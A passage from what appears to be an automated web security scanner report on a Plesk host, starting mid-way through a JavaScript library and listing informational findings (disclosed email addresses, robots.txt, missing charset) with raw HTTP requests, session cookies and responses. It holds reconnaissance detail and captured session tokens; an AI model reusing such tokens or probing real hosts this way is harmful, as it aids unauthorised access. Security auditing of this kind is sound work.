document.getElementsByTagName("body").item(0).appendChild(Sortable._marker);
}
var offsets = Position.cumulativeOffset(dropon);
Sortable._marker.setStyle({left: offsets[0]+'px', top: offsets[1] + 'px'});

if(position=='after')
if(sortable.overlap == 'horizontal')
Sortable._marker.setStyle({left: (offsets[0]+dropon.clientWidth) + 'px'});
else
Sortable._marker.setStyle({top: (offsets[1]+dropon.clientHeight) + 'px'});

Sortable._marker.show();
},

_tree: function(element, options, parent) {
var children = Sortable.findElements(element, options) || [];

for (var i = 0; i < children.length; ++i) {
var match = children[i].id.match(options.format);

if (!match) continue;

var child = {
id: encodeURIComponent(match ? match[1] : null),
element: element,
parent: parent,
children: [],
position: parent.children.length,
container: $(children[i]).down(options.treeTag)
}

/* Get the element containing the children and recurse over it */
if (child.container)
this._tree(child.container, options, child)

parent.children.push (child);
}

return parent;
},

tree: function(element) {
element = $(element);
var sortableOptions = this.options(element);
var options = Object.extend({
tag: sortableOptions.tag,
treeTag: sortableOptions.treeTag,
only: sortableOptions.only,
name: element.id,
format: sortableOptions.format
}, arguments[1] || { });

var root = {
id: null,
parent: null,
children: [],
container: element,
position: 0
}

return Sortable._tree(element, options, root);
},

/* Construct a [i] index for a particular node */
_constructIndex: function(node) {
var index = '';
do {
if (node.id) index = '[' + node.position + ']' + index;
} while ((node = node.parent) != null);
return index;
},

sequence: function(element) {
element = $(element);
var options = Object.extend(this.options(element), arguments[1] || { });

return $(this.findElements(element, options) || []).map( function(item) {
return item.id.match(options.format) ? item.id.match(options.format)[1] : '';
});
},

setSequence: function(element, new_sequence) {
element = $(element);
var options = Object.extend(this.options(element), arguments[2] || { });

var nodeMap = { };
this.findElements(element, options).each( function(n) {
if (n.id.match(options.format))
nodeMap[n.id.match(options.format)[1]] = [n, n.parentNode];
n.parentNode.removeChild(n);
});

new_sequence.each(function(ident) {
var n = nodeMap[ident];
if (n) {
n[1].appendChild(n[0]);
delete nodeMap[ident];
}
});
},

serialize: function(element) {
element = $(element);
var options = Object.extend(Sortable.options(element), arguments[1] || { });
var name = encodeURIComponent(
(arguments[1] && arguments[1].name) ? arguments[1].name : element.id);

if (options.tree) {
return Sortable.tree(element, arguments[1]).children.map( function (item) {
return [name + Sortable._constructIndex(item) + "[id]=" +
encodeURIComponent(item.id)].concat(item.children.map(arguments.callee));
}).flatten().join('&');
} else {
return Sortable.sequence(element, arguments[1]).map( function(item) {
return name + "[]=" + encodeURIComponent(item);
}).join('&');
}
}
}

// Returns true if child is contained within element
Element.isParent = function(child, element) {
if (!child.parentNode || child == element) return false;
if (child.parentNode == element) return true;
return Element.isParent(child.parentNode, element);
}

Element.findChildren = function(element, only, recursive, tagName) {
if(!element.hasChildNodes()) return null;
tagName = tagName.toUpperCase();
if(only) only = [only].flatten();
var elements = [];
$A(element.childNodes).each( function(e) {
if(e.tagName && e.tagName.toUpperCase()==tagName &&
(!only || (Element.classNames(e).detect(function(v) { return only.include(v) }))))
elements.push(e);
if(recursive) {
var grandchildren = Element.findChildren(e, only, recursive, tagName);
if(grandchildren) elements.push(grandchildren);
}
});

return (elements.length>0 ? elements.flatten() : []);
}

Element.offsetSize = function (element, type) {
return element['offset' + ((type=='vertical' || type=='height') ? 'Height' : 'Width')];
}

7.6. http://vulnerarable.plesk.smb.10.2.0.site:2006/localizedimage.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/localizedimage.php

Issue detail

The following email address was disclosed in the response:

bugreport@parallels.com

Request

GET /localizedimage.php HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

7.7. http://vulnerarable.plesk.smb.10.2.0.site:2006/wysiwyg/BlockModule.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/wysiwyg/BlockModule.js

Issue detail

The following email address was disclosed in the response:

epalchukovsky@swsoft.com

Request

GET /wysiwyg/BlockModule.js?5.0.0.2009110318 HTTP/1.1
Accept: */*
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/wysiwyg/custom/fckeditor.wizard.html?cacheId=5.0.0.2009110318&currentPageId=q485ez4jvyq&editFilePath=/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php&InstanceName=wysiwyg&Toolbar=wizard
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US; SessionID=42b54cb11fc3aedbd; psaContext=dashboard; testCookie=test

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 11 Jun 2008 15:03:52 GMT
Accept-Ranges: bytes
ETag: "0bc2c5cd4cbc81:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:09:14 GMT
Content-Length: 2823

/**
* Block module on WYSIWYG
*
* @author Evgueni Palchukovsky <epalchukovsky@swsoft.com>
* @version $Id: BlockModule.js 29054 2008-06-11 11:03:51Z aiskrenkov $
* @since 2006/08/09
* @package SB
* @subpackage WYSIWYG
* @copyright (c) 2004-2006, SWsoft
*/

function BlockModule(mainFrame, moduleName) {
   this.mainFrame = mainFrame;
   //this.settingsDialogLink = settingsDialogLink;
   this.moduleName = moduleName;
}

BlockModule.prototype.getFckWindow = function() {
   if ('undefined' != typeof window.FCKeditorAPI) {
       return window;
   } else {
       return window.parent.parent.parent;
   }
}

BlockModule.prototype.showSettingsDialog = function(settingsDialogLink, width, height) {
   this.getFckWindow().parent.sbBlockModuleEditorDialogObject.show(this.moduleName, settingsDialogLink, width, height);
}

BlockModule.prototype.removeModule = function() {
   this.getFckWindow().parent.sbApplyChangesObject.registerChange();
   this.mainFrame.parentNode.removeChild(this.mainFrame);
}

BlockModule.prototype.resizeMainFrame = function() {
   this.disable();
   this.resizeFrame(this.mainFrame);
   var wysiwyg = this.getFckWindow().FCKeditorAPI.GetInstance('wysiwyg');
   if (wysiwyg) {
       if (wysiwyg.Window_OnResize) {
           wysiwyg.Window_OnResize();
       } else if ('undefined' != typeof this.getFckWindow().ResizeContentFrame) {
           this.getFckWindow().ResizeContentFrame();
       }
   }
   this.disable();
}

BlockModule.prototype.disableFormsElements = function() {
   doc = this.getPreviewFrame().contentWindow.document;
   for(i = 0; i < doc.forms.length; i++) {
       for(j = 0; j < doc.forms[i].elements.length; j++) {
           doc.forms[i].elements[j].disabled = true;
       }
   }
}

BlockModule.prototype.resizePreviewFrame = function() {
   this.disableFormsElements();
   this.resizeFrame(this.getPreviewFrame(), 1);
   if (document.all) {
       var disablerControl = this.getPreviewFrame().contentWindow.document.getElementById('disabler');
       disablerControl.style.width = '0px';
       disablerControl.style.height = '0px';
   }
}

BlockModule.prototype.resizeFrame = function(frame, ex) {
   if (ex == null) {
       ex = 0;
   }
   frame.style.height = (frame.contentWindow.document.body.scrollHeight+ex)+'px';
}

BlockModule.prototype.getPreviewFrame = function() {
   return this.mainFrame.contentWindow.document.getElementById('preview');
}

BlockModule.prototype.disable = function() {
   var doc = this.mainFrame.contentWindow.document;
   var previewHolder = doc.getElementById('previewHolder');
   var offset = previewHolder.offsetTop;
   for(    node = previewHolder.offsetParent;
           node;
           node = node.offsetParent) {
       offset += node.offsetTop;
   }
   /*
   var disablerControl = doc.getElementById('disabler');
   disablerControl.style.width = previewHolder.scrollWidth + 'px';
   disablerControl.style.height = previewHolder.scrollHeight + 'px';
   disablerControl.style.top = offset;
   */
}

8. Robots.txt file previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/robots.txt

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 11 Jun 2008 15:03:52 GMT
Accept-Ranges: bytes
ETag: "0bc2c5cd4cbc81:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 04:57:48 GMT
Connection: close
Content-Length: 25

User-agent: *
Disallow: /

9. HTML does not specify charset previous
There are 3 instances of this issue:

/Wizard/Edit/Modules/Image
/blank.html
/localizedimage.php

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

9.1. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/Image previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/Wizard/Edit/Modules/Image

Request

Response

9.2. http://vulnerarable.plesk.smb.10.2.0.site:2006/blank.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/blank.html

Request

GET /blank.html HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Html?currentPageId=q485ez4jvyq
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US; SessionID=42b54cb11fc3aedbd; psaContext=dashboard; testCookie=test

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 11 Jun 2008 15:03:52 GMT
Accept-Ranges: bytes
ETag: "0bc2c5cd4cbc81:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:08:31 GMT
Content-Length: 28

<html>
<body></body>
</html>

9.3. http://vulnerarable.plesk.smb.10.2.0.site:2006/localizedimage.php previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/localizedimage.php

Request

Response

Report generated by XSS.CX Research Blog at Tue Oct 12 16:27:23 CDT 2010.